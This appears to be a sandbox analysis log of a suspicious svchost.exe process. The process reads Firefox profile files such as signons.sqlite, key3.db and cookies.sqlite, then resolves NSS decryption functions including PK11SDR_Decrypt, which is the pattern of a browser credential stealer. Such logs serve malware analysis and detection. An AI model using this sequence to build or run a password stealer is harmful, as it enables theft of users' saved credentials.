File Get Info filename = C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\sessionstore.bak, type = size True 1
Fn
Module Create Mapping module_name = C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\sessionstore.bak, filename = C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\sessionstore.bak, protection = PAGE_READONLY, maximum_size = 0 True 1
Fn
Module Map C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\sessionstore.bak, process_name = c:\windows\syswow64\svchost.exe, desired_access = FILE_MAP_READ True 1
Fn
Module Unmap process_name = c:\windows\syswow64\svchost.exe True 1
Fn
File Create filename = C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\sessionstore.js, desired_access = FILE_READ_ATTRIBUTES True 2
Fn
File Create filename = C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\sessionstore.js, desired_access = GENERIC_READ, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE True 1
Fn
File Get Info filename = C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\sessionstore.js, type = size True 1
Fn
Module Create Mapping module_name = C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\sessionstore.js, filename = C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\sessionstore.js, protection = PAGE_READONLY, maximum_size = 0 True 1
Fn
Module Map C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\sessionstore.js, process_name = c:\windows\syswow64\svchost.exe, desired_access = FILE_MAP_READ True 1
Fn
Module Unmap process_name = c:\windows\syswow64\svchost.exe True 1
Fn
File Create filename = C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\signons.sqlite, desired_access = FILE_READ_ATTRIBUTES True 2
Fn
File Create filename = C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\signons.sqlite, desired_access = GENERIC_READ, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE True 1
Fn
File Get Info filename = C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\signons.sqlite, type = size True 1
Fn
Module Create Mapping module_name = C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\signons.sqlite, filename = C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\signons.sqlite, protection = PAGE_READONLY, maximum_size = 0 True 1
Fn
Module Map C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\signons.sqlite, process_name = c:\windows\syswow64\svchost.exe, desired_access = FILE_MAP_READ True 1
Fn
Module Unmap process_name = c:\windows\syswow64\svchost.exe True 1
Fn
File Add Search Path filename = C:\Program Files (x86)\Mozilla Firefox True 1
Fn
Module Load module_name = nss3.dll, base_address = 0x74490000 True 1
Fn
Module Get Address module_name = Unknown module name, function = NSS_Init, address_out = 0x7454d70b True 1
Fn
Module Get Address module_name = Unknown module name, function = NSS_Shutdown, address_out = 0x7454d13c True 1
Fn
Module Get Address module_name = Unknown module name, function = SECITEM_FreeItem, address_out = 0x7454e656 True 1
Fn
Module Get Address module_name = Unknown module name, function = PK11_GetInternalKeySlot, address_out = 0x744e3c51 True 1
Fn
Module Get Address module_name = Unknown module name, function = PK11_Authenticate, address_out = 0x744cd3ca True 1
Fn
Module Get Address module_name = Unknown module name, function = PK11SDR_Decrypt, address_out = 0x744e00a7 True 1
Fn
Module Get Address module_name = Unknown module name, function = PK11_FreeSlot, address_out = 0x744e3333 True 1
Fn
File Create filename = C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\signons.sqlite, desired_access = GENERIC_READ, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE True 1
Fn
File Get Info filename = C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\signons.sqlite, type = size True 1
Fn
File Read filename = C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\signons.sqlite, size = 4096, size_out = 4096 True 80
Fn
Data
File Read filename = C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\signons.sqlite, size = 4096, size_out = 0 True 1
Fn
File Create filename = C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\times.json, desired_access = FILE_READ_ATTRIBUTES True 2
Fn
File Create filename = C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\times.json, desired_access = GENERIC_READ, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE True 1
Fn
File Get Info filename = C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\times.json, type = size True 1
Fn
Module Create Mapping module_name = C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\times.json, filename = C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\times.json, protection = PAGE_READONLY, maximum_size = 0 True 1
Fn
Module Map C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\times.json, process_name = c:\windows\syswow64\svchost.exe, desired_access = FILE_MAP_READ True 1
Fn
Module Unmap process_name = c:\windows\syswow64\svchost.exe True 1
Fn
File Create filename = C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\urlclassifierkey3.txt, desired_access = FILE_READ_ATTRIBUTES True 2
Fn
File Create filename = C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\urlclassifierkey3.txt, desired_access = GENERIC_READ, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE True 1
Fn
File Get Info filename = C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\urlclassifierkey3.txt, type = size True 1
Fn
Module Create Mapping module_name = C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\urlclassifierkey3.txt, filename = C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\urlclassifierkey3.txt, protection = PAGE_READONLY, maximum_size = 0 True 1
Fn
Module Map C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\urlclassifierkey3.txt, process_name = c:\windows\syswow64\svchost.exe, desired_access = FILE_MAP_READ True 1
Fn
Module Unmap process_name = c:\windows\syswow64\svchost.exe True 1
Fn
File Create filename = C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\webapps\webapps.json, desired_access = FILE_READ_ATTRIBUTES True 2
Fn
File Create filename = C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\webapps\webapps.json, desired_access = GENERIC_READ, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE True 1
Fn
File Get Info filename = C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\webapps\webapps.json, type = size True 1
Fn
Module Create Mapping module_name = C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\webapps\webapps.json, filename = C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\webapps\webapps.json, protection = PAGE_READONLY, maximum_size = 0 True 1
Fn
Module Map C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\webapps\webapps.json, process_name = c:\windows\syswow64\svchost.exe, desired_access = FILE_MAP_READ True 1
Fn
Module Unmap process_name = c:\windows\syswow64\svchost.exe True 1
Fn
File Create filename = C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\webappsstore.sqlite, desired_access = FILE_READ_ATTRIBUTES True 2
Fn
File Create filename = C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\webappsstore.sqlite, desired_access = GENERIC_READ, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE True 1
Fn
File Get Info filename = C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\webappsstore.sqlite, type = size True 1
Fn
Module Create Mapping module_name = C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\webappsstore.sqlite, filename = C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\webappsstore.sqlite, protection = PAGE_READONLY, maximum_size = 0 True 1
Fn
Module Map C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\webappsstore.sqlite, process_name = c:\windows\syswow64\svchost.exe, desired_access = FILE_MAP_READ True 1
Fn
Module Unmap process_name = c:\windows\syswow64\svchost.exe True 1
Fn
File Create filename = C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Crash Reports\InstallTime20131025151332, desired_access = FILE_READ_ATTRIBUTES True 2
Fn
File Create filename = C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Crash Reports\InstallTime20131025151332, desired_access = GENERIC_READ, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE True 1
Fn
File Get Info filename = C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Crash Reports\InstallTime20131025151332, type = size True 1
Fn
Module Create Mapping module_name = C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Crash Reports\InstallTime20131025151332, filename = C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Crash Reports\InstallTime20131025151332, protection = PAGE_READONLY, maximum_size = 0 True 1
Fn
Module Map C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Crash Reports\InstallTime20131025151332, process_name = c:\windows\syswow64\svchost.exe, desired_access = FILE_MAP_READ True 1
Fn
Module Unmap process_name = c:\windows\syswow64\svchost.exe True 1
Fn
File Create filename = C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\addons.json, desired_access = FILE_READ_ATTRIBUTES True 2
Fn
File Create filename = C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\addons.json, desired_access = GENERIC_READ, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE True 1
Fn
File Get Info filename = C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\addons.json, type = size True 1
Fn
Module Create Mapping module_name = C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\addons.json, filename = C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\addons.json, protection = PAGE_READONLY, maximum_size = 0 True 1
Fn
Module Map C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\addons.json, process_name = c:\windows\syswow64\svchost.exe, desired_access = FILE_MAP_READ True 1
Fn
Module Unmap process_name = c:\windows\syswow64\svchost.exe True 1
Fn
File Create filename = C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\bookmarkbackups\bookmarks-2017-06-30_5.json, desired_access = FILE_READ_ATTRIBUTES True 2
Fn
File Create filename = C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\bookmarkbackups\bookmarks-2017-06-30_5.json, desired_access = GENERIC_READ, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE True 1
Fn
File Get Info filename = C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\bookmarkbackups\bookmarks-2017-06-30_5.json, type = size True 1
Fn
Module Create Mapping module_name = C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\bookmarkbackups\bookmarks-2017-06-30_5.json, filename = C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\bookmarkbackups\bookmarks-2017-06-30_5.json, protection = PAGE_READONLY, maximum_size = 0 True 1
Fn
Module Map C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\bookmarkbackups\bookmarks-2017-06-30_5.json, process_name = c:\windows\syswow64\svchost.exe, desired_access = FILE_MAP_READ True 1
Fn
Module Unmap process_name = c:\windows\syswow64\svchost.exe True 1
Fn
File Create filename = C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\bookmarkbackups\bookmarks-2017-07-26_5.json, desired_access = FILE_READ_ATTRIBUTES True 2
Fn
File Create filename = C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\bookmarkbackups\bookmarks-2017-07-26_5.json, desired_access = GENERIC_READ, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE True 1
Fn
File Get Info filename = C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\bookmarkbackups\bookmarks-2017-07-26_5.json, type = size True 1
Fn
Module Create Mapping module_name = C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\bookmarkbackups\bookmarks-2017-07-26_5.json, filename = C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\bookmarkbackups\bookmarks-2017-07-26_5.json, protection = PAGE_READONLY, maximum_size = 0 True 1
Fn
Module Map C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\bookmarkbackups\bookmarks-2017-07-26_5.json, process_name = c:\windows\syswow64\svchost.exe, desired_access = FILE_MAP_READ True 1
Fn
Module Unmap process_name = c:\windows\syswow64\svchost.exe True 1
Fn
File Create filename = C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\cert8.db, desired_access = FILE_READ_ATTRIBUTES True 2
Fn
File Create filename = C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\cert8.db, desired_access = GENERIC_READ, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE True 1
Fn
File Get Info filename = C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\cert8.db, type = size True 1
Fn
Module Create Mapping module_name = C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\cert8.db, filename = C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\cert8.db, protection = PAGE_READONLY, maximum_size = 0 True 1
Fn
Module Map C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\cert8.db, process_name = c:\windows\syswow64\svchost.exe, desired_access = FILE_MAP_READ True 1
Fn
Module Unmap process_name = c:\windows\syswow64\svchost.exe True 1
Fn
File Create filename = C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\compatibility.ini, desired_access = FILE_READ_ATTRIBUTES True 2
Fn
File Create filename = C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\compatibility.ini, desired_access = GENERIC_READ, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE True 1
Fn
File Get Info filename = C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\compatibility.ini, type = size True 1
Fn
Module Create Mapping module_name = C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\compatibility.ini, filename = C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\compatibility.ini, protection = PAGE_READONLY, maximum_size = 0 True 1
Fn
Module Map C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\compatibility.ini, process_name = c:\windows\syswow64\svchost.exe, desired_access = FILE_MAP_READ True 1
Fn
Module Unmap process_name = c:\windows\syswow64\svchost.exe True 1
Fn
File Create filename = C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\content-prefs.sqlite, desired_access = FILE_READ_ATTRIBUTES True 2
Fn
File Create filename = C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\content-prefs.sqlite, desired_access = GENERIC_READ, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE True 1
Fn
File Get Info filename = C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\content-prefs.sqlite, type = size True 1
Fn
Module Create Mapping module_name = C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\content-prefs.sqlite, filename = C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\content-prefs.sqlite, protection = PAGE_READONLY, maximum_size = 0 True 1
Fn
Module Map C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\content-prefs.sqlite, process_name = c:\windows\syswow64\svchost.exe, desired_access = FILE_MAP_READ True 1
Fn
Module Unmap process_name = c:\windows\syswow64\svchost.exe True 1
Fn
File Create filename = C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\cookies.sqlite, desired_access = FILE_READ_ATTRIBUTES True 2
Fn
File Create filename = C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\cookies.sqlite, desired_access = GENERIC_READ, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE True 1
Fn
File Get Info filename = C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\cookies.sqlite, type = size True 1
Fn
Module Create Mapping module_name = C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\cookies.sqlite, filename = C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\cookies.sqlite, protection = PAGE_READONLY, maximum_size = 0 True 1
Fn
Module Map C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\cookies.sqlite, process_name = c:\windows\syswow64\svchost.exe, desired_access = FILE_MAP_READ True 1
Fn
Module Unmap process_name = c:\windows\syswow64\svchost.exe True 1
Fn
File Create filename = C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\downloads.sqlite, desired_access = FILE_READ_ATTRIBUTES True 2
Fn
File Create filename = C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\downloads.sqlite, desired_access = GENERIC_READ, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE True 1
Fn
File Get Info filename = C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\downloads.sqlite, type = size True 1
Fn
Module Create Mapping module_name = C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\downloads.sqlite, filename = C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\downloads.sqlite, protection = PAGE_READONLY, maximum_size = 0 True 1
Fn
Module Map C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\downloads.sqlite, process_name = c:\windows\syswow64\svchost.exe, desired_access = FILE_MAP_READ True 1
Fn
Module Unmap process_name = c:\windows\syswow64\svchost.exe True 1
Fn
File Create filename = C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\extensions.ini, desired_access = FILE_READ_ATTRIBUTES True 2
Fn
File Create filename = C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\extensions.ini, desired_access = GENERIC_READ, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE True 1
Fn
File Get Info filename = C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\extensions.ini, type = size True 1
Fn
Module Create Mapping module_name = C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\extensions.ini, filename = C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\extensions.ini, protection = PAGE_READONLY, maximum_size = 0 True 1
Fn
Module Map C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\extensions.ini, process_name = c:\windows\syswow64\svchost.exe, desired_access = FILE_MAP_READ True 1
Fn
Module Unmap process_name = c:\windows\syswow64\svchost.exe True 1
Fn
File Create filename = C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\extensions.sqlite, desired_access = FILE_READ_ATTRIBUTES True 2
Fn
File Create filename = C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\extensions.sqlite, desired_access = GENERIC_READ, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE True 1
Fn
File Get Info filename = C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\extensions.sqlite, type = size True 1
Fn
Module Create Mapping module_name = C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\extensions.sqlite, filename = C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\extensions.sqlite, protection = PAGE_READONLY, maximum_size = 0 True 1
Fn
Module Map C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\extensions.sqlite, process_name = c:\windows\syswow64\svchost.exe, desired_access = FILE_MAP_READ True 1
Fn
Module Unmap process_name = c:\windows\syswow64\svchost.exe True 1
Fn
File Create filename = C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\formhistory.sqlite, desired_access = FILE_READ_ATTRIBUTES True 2
Fn
File Create filename = C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\formhistory.sqlite, desired_access = GENERIC_READ, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE True 1
Fn
File Get Info filename = C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\formhistory.sqlite, type = size True 1
Fn
Module Create Mapping module_name = C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\formhistory.sqlite, filename = C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\formhistory.sqlite, protection = PAGE_READONLY, maximum_size = 0 True 1
Fn
Module Map C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\formhistory.sqlite, process_name = c:\windows\syswow64\svchost.exe, desired_access = FILE_MAP_READ True 1
Fn
Module Unmap process_name = c:\windows\syswow64\svchost.exe True 1
Fn
File Create filename = C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\healthreport.sqlite, desired_access = FILE_READ_ATTRIBUTES True 2
Fn
File Create filename = C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\healthreport.sqlite, desired_access = GENERIC_READ, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE True 1
Fn
File Get Info filename = C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\healthreport.sqlite, type = size True 1
Fn
Module Create Mapping module_name = C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\healthreport.sqlite, filename = C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\healthreport.sqlite, protection = PAGE_READONLY, maximum_size = 0 True 1
Fn
Module Map C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\healthreport.sqlite, process_name = c:\windows\syswow64\svchost.exe, desired_access = FILE_MAP_READ True 1
Fn
Module Unmap process_name = c:\windows\syswow64\svchost.exe True 1
Fn
File Create filename = C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\indexedDB\moz-safe-about+home\.metadata, desired_access = FILE_READ_ATTRIBUTES True 2
Fn
File Create filename = C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\indexedDB\moz-safe-about+home\.metadata, desired_access = GENERIC_READ, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE True 1
Fn
File Get Info filename = C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\indexedDB\moz-safe-about+home\.metadata, type = size True 1
Fn
Module Create Mapping module_name = C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\indexedDB\moz-safe-about+home\.metadata, filename = C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\indexedDB\moz-safe-about+home\.metadata, protection = PAGE_READONLY, maximum_size = 0 False 1
Fn
File Create filename = C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\indexedDB\moz-safe-about+home\idb\818200132aebmoouht.sqlite, desired_access = FILE_READ_ATTRIBUTES True 2
Fn
File Create filename = C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\indexedDB\moz-safe-about+home\idb\818200132aebmoouht.sqlite, desired_access = GENERIC_READ, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE True 1
Fn
File Get Info filename = C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\indexedDB\moz-safe-about+home\idb\818200132aebmoouht.sqlite, type = size True 1
Fn
Module Create Mapping module_name = C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\indexedDB\moz-safe-about+home\idb\818200132aebmoouht.sqlite, filename = C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\indexedDB\moz-safe-about+home\idb\818200132aebmoouht.sqlite, protection = PAGE_READONLY, maximum_size = 0 True 1
Fn
Module Map C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\indexedDB\moz-safe-about+home\idb\818200132aebmoouht.sqlite, process_name = c:\windows\syswow64\svchost.exe, desired_access = FILE_MAP_READ True 1
Fn
Module Unmap process_name = c:\windows\syswow64\svchost.exe True 1
Fn
File Create filename = C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\key3.db, desired_access = FILE_READ_ATTRIBUTES True 2
Fn
File Create filename = C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\key3.db, desired_access = GENERIC_READ, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE True 1
Fn
File Get Info filename = C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\key3.db, type = size True 1
Fn
Module Create Mapping module_name = C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\key3.db, filename = C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\key3.db, protection = PAGE_READONLY, maximum_size = 0 True 1
Fn
Module Map C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\key3.db, process_name = c:\windows\syswow64\svchost.exe, desired_access = FILE_MAP_READ True 1
Fn
Module Unmap process_name = c:\windows\syswow64\svchost.exe True 1
Fn
File Create filename = C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\localstore.rdf, desired_access = FILE_READ_ATTRIBUTES True 2
Fn
File Create filename = C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\localstore.rdf, desired_access = GENERIC_READ, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE True 1
Fn
File Get Info filename = C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\localstore.rdf, type = size True 1
Fn
Module Create Mapping module_name = C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\localstore.rdf, filename = C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\localstore.rdf, protection = PAGE_READONLY, maximum_size = 0 True 1
Fn
Module Map C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\localstore.rdf, process_name = c:\windows\syswow64\svchost.exe, desired_access = FILE_MAP_READ True 1
Fn
Module Unmap process_name = c:\windows\syswow64\svchost.exe True 1
Fn
File Create filename = C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\marionette.log, desired_access = FILE_READ_ATTRIBUTES True 2
Fn
